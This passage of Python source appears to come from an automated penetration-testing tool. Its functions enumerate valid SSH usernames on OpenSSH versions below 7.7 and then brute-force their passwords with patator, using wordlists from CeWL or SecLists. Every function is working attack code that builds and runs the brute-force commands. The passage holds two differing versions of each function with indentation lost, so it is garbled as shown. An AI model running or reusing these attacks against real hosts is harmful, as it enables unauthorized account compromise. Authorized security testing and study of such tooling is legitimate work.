def SshSingleUserBrute(self):
cmd_info = "[" + fg.green + "+" + fg.rs + "]"
cwd = os.getcwd()
reportDir = f"{cwd}/{self.target}-Report"
cl = helper_lists.Cewl(self.target)
if not os.path.exists(f"{reportDir}/wordlists/all.txt"):
cl.CewlWordlist()
green = fg.li_green
teal = fg.li_cyan
reset = fg.rs
np = nmapParser.NmapParserFunk(self.target)
np.openPorts()
if os.path.exists(f"{reportDir}/wordlists/all.txt"):
cewl_wordlist = f"{reportDir}/wordlists/all.txt"
if os.path.getsize(cewl_wordlist) > 0:
print(
f"{teal}Beginning Password Brute Force for User:{reset} {green}{self.user}{reset}"
)
patator_cmd = f"""patator ssh_login host={self.target} port={self.port} user={self.user} password=FILE0 0={cewl_wordlist} persistent=0 -x ignore:mesg='Authentication failed.'"""
print(f"{cmd_info} {patator_cmd}")
call(patator_cmd, shell=True)
else:
print(
f"{teal}Beginning Password Brute Force for User:{reset} {green}{self.user}{reset}"
)
patator_cmd = f"""patator ssh_login host={self.target} port={self.port} user={self.user} password=FILE0 0={cwd}/wordlists/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed.'"""
print(f"{cmd_info} {patator_cmd}")
call(patator_cmd, shell=True)
def SshSingleUserBrute(self):
"""Run patator with seclists probable top 1575 wordlist against a single user specified as a command line argument."""
cmd_info = "[" + fg.green + "+" + fg.rs + "]"
c = config_parser.CommandParser(f"{os.getcwd()}/config/config.yaml",
self.target)
cl = helper_lists.Cewl(self.target)
if not os.path.exists(c.getPath("wordlists", "CewlPlus")):
cl.CewlWordlist()
green = fg.li_green
teal = fg.li_cyan
reset = fg.rs
np = nmapParser.NmapParserFunk(self.target)
np.openPorts()
if os.path.exists(c.getPath("wordlists", "CewlPlus")):
if os.path.getsize(c.getPath("wordlists", "CewlPlus")) > 0:
print(
f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.user}{reset}"""
)
patator_cmd = c.getCmd("ssh",
"patator_ssh_cewl_auto",
port=self.port,
user=self.user)
print(f"""{cmd_info} {patator_cmd}""")
call(patator_cmd, shell=True)
else:
print(
f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.user}{reset}"""
)
patator_cmd = c.getCmd("ssh",
"patator_ssh_auto",
port=self.port,
user=self.user)
print(f"""{cmd_info} {patator_cmd}""")
call(patator_cmd, shell=True)
def SshUsersBrute(self):
"""If OpenSSH is in the service banner and < 7.7 from nmapParser's results. Then enumerate valid usernames from SSH using a small wordlist of around 600 common names.
If a valid Username is found that isn't in the list of default linux / windows usernames, from utils/helper_lists.py. Proceed to brute force that usernames password with
patator using Seclists probable top 1575.txt wordlist with a few custom added passwords."""
cmd_info = "[" + fg.green + "+" + fg.rs + "]"
cmd_info_orange = "[" + fg.li_yellow + "+" + fg.rs + "]"
c = config_parser.CommandParser(f"{os.getcwd()}/config/config.yaml", self.target)
dlu = helper_lists.DefaultLinuxUsers(self.target)
default_linux_users = dlu.default_linux_users
cl = helper_lists.Cewl(self.target)
if not os.path.exists(c.getPath("wordlists", "CewlPlus")):
cl.CewlWordlist()
blue = fg.li_blue
green = fg.li_green
yellow = fg.li_yellow
red = fg.red
teal = fg.li_cyan
reset = fg.rs
np = nmapParser.NmapParserFunk(self.target)
np.openPorts()
ssh_product = np.ssh_product
ssh_version = np.ssh_version
string_ssh_version = " ".join(map(str, ssh_version))
lowercase_ssh_version = str(string_ssh_version).lower()
first_two_nums = lowercase_ssh_version[0:3]
int_first_two_nums = float(first_two_nums)
if ssh_product[0] == "OpenSSH":
if int_first_two_nums < float(7.7):
if not os.path.exists(c.getPath("ssh", "sshDir")):
os.makedirs(c.getPath("ssh", "sshDir"))
cmd = c.getCmd("ssh", "ssh_user_enum", port=self.port)
print(cmd_info, cmd)
print("This may take a few minutes.")
try:
call(cmd, shell=True)
except ConnectionRefusedError as cre_error:
print(cre_error)
exit()
try:
with open(c.getPath("ssh", "ssh_usernames"), "r") as json_file:
data = json.load(json_file)
num_valid_users = len(data["Valid"])
if num_valid_users < 55:
for valid in data["Valid"]:
if valid not in default_linux_users:
print(f"""{cmd_info} {teal}Unique User Found!{reset} {green}{valid}{reset}""")
self.unique_users.append(valid)
else:
print(f"""{cmd_info} """ + valid)
else:
print(f"""OpenSSH returned too many false positives: {num_valid_users}""")
except FileNotFoundError as fnf_error:
print(fnf_error)
exit()
if len(self.unique_users) > 0 and (len(self.unique_users) < 4):
if os.path.exists(c.getPath("wordlists", "CewlPlus")):
if os.path.getsize(c.getPath("wordlists", "CewlPlus")) > 0:
for u in self.unique_users:
print(f"""{teal}Beginning Password Brute Force for User: {reset} {green}{u}{reset}""")
patator_cmd = c.getCmd("ssh", "patator_ssh_cewl_auto", port=self.port, user=u)
print(f"""{cmd_info} {patator_cmd}""")
call(patator_cmd, shell=True)
else:
for u in self.unique_users:
print(f"""{teal}Beginning Password Brute Force for User: {reset} {green}{u}{reset}""")
patator_cmd = c.getCmd("ssh", "patator_ssh_auto", port=self.port, user=u)
print(f"""{cmd_info} {patator_cmd}""")
call(patator_cmd, shell=True)
else:
print(f"""{blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}NOT{reset} vulnerable to User Enumeration""")
print(f"""If you still want to brute force SSH, Consider using a tool such as Hydra or Patator manually.""")
print(f"""For example""")
print(f"""{cmd_info_orange}{yellow} {c.getCmd("ssh","patator_ssh_auto", port=self.port, user="******")} {reset}""")
def SshUsersBrute(self):
cmd_info = "[" + fg.green + "+" + fg.rs + "]"
cwd = os.getcwd()
reportDir = f"{cwd}/{self.target}-Report"
dlu = helper_lists.DefaultLinuxUsers(self.target)
default_linux_users = dlu.default_linux_users
cl = helper_lists.Cewl(self.target)
if not os.path.exists(f"{reportDir}/wordlists/all.txt"):
cl.CewlWordlist()
blue = fg.li_blue
green = fg.li_green
red = fg.red
teal = fg.li_cyan
reset = fg.rs
np = nmapParser.NmapParserFunk(self.target)
np.openPorts()
ssh_product = np.ssh_product
ssh_version = np.ssh_version
string_ssh_version = " ".join(map(str, ssh_version))
lowercase_ssh_version = str(string_ssh_version).lower()
first_two_nums = lowercase_ssh_version[0:3]
int_first_two_nums = float(first_two_nums)
if ssh_product[0] == "OpenSSH":
if int_first_two_nums < float(7.7):
if not os.path.exists(f"{reportDir}/ssh"):
os.makedirs(f"{reportDir}/ssh")
# print(f"Target:{self.target} serviceName:{self.serviceName} port:{self.port}")
cmd = f"python {cwd}/scripts/ssh_user_enum.py --port {self.port} --userList wordlists/usernames.txt {self.target} --outputFile {reportDir}/ssh/ssh-usernames.json --outputFormat json"
print(cmd_info, cmd)
print("This may take a few minutes.")
try:
call(cmd, shell=True)
except ConnectionRefusedError as cre_error:
print(cre_error)
exit()
try:
with open(f"{reportDir}/ssh/ssh-usernames.json"
) as json_file:
data = json.load(json_file)
num_valid_users = len(data["Valid"])
if num_valid_users < 55:
for valid in data["Valid"]:
if valid not in default_linux_users:
print(
f"{cmd_info} {teal}Unique User Found!{reset} {green}{valid}{reset}"
)
self.unique_users.append(valid)
else:
print(f"{cmd_info} " + valid)
else:
print(
f"OpenSSH returned too many false positives: {num_valid_users}"
)
except FileNotFoundError as fnf_error:
print(fnf_error)
exit()
if len(self.unique_users) > 0 and (len(self.unique_users) < 4):
if os.path.exists(f"{reportDir}/wordlists/all.txt"):
cewl_wordlist = f"{reportDir}/wordlists/all.txt"
if os.path.getsize(cewl_wordlist) > 0:
for u in self.unique_users:
print(
f"{teal}Beginning Password Brute Force for User:{reset} {green}{u}{reset}"
)
patator_cmd = f"""patator ssh_login host={self.target} port={self.port} user={u} password=FILE0 0={cewl_wordlist} persistent=0 -x ignore:mesg='Authentication failed.'"""
print(f"{cmd_info} {patator_cmd}")
call(patator_cmd, shell=True)
else:
for u in self.unique_users:
print(
f"{teal}Beginning Password Brute Force for User:{reset} {green}{u}{reset}"
)
patator_cmd = f"""patator ssh_login host={self.target} port={self.port} user={u} password=FILE0 0={cwd}/wordlists/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed.'"""
print(f"{cmd_info} {patator_cmd}")
call(patator_cmd, shell=True)
else:
print(
f"{blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}NOT{reset} vulnerable to User Enumeration"
)
print(
f"If you still want to brute force SSH, Consider using a tool such as Hydra or Patator manually."
)
print(f"For example")
print(
f"""{cmd_info} patator ssh_login host={self.target} port=22 user='******' password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed.'"""
)